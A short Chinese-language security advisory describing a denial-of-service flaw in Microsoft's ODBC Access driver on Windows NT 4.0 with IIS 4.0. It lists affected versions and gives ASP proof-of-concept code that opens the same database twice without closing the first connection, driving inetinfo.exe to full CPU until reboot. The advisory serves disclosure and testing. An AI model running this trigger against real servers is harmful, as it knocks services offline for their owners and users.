解決 18、MS ODBC資料庫連接溢出導致NT/9x拒絕服務的攻擊
漏 洞 描 述:
Microsoft ODBC資料庫在串連和斷開時可能存在潛在的溢出問題(Microsoft ACCESS資料庫相關)。
如果不取消串連而直接和第二個資料庫相串連,可能導致服務停止。
影響系統:
ODBC 版本: 3.510.3711.0
ODBC Access驅動版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)
漏洞檢測方法如下:
ODBC 串連源名稱: miscdb
ODBC 資料庫型號: MS Access
ODBC 假設路徑: d:\data\misc.mdb
ASP代碼如下:
<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"
%>
<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>
<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>
在這種情況下,IIS處理進程將會停頓,CPU使用率由於inetinfo.exe進程將達到100%。只有重新啟動電腦才能恢複。
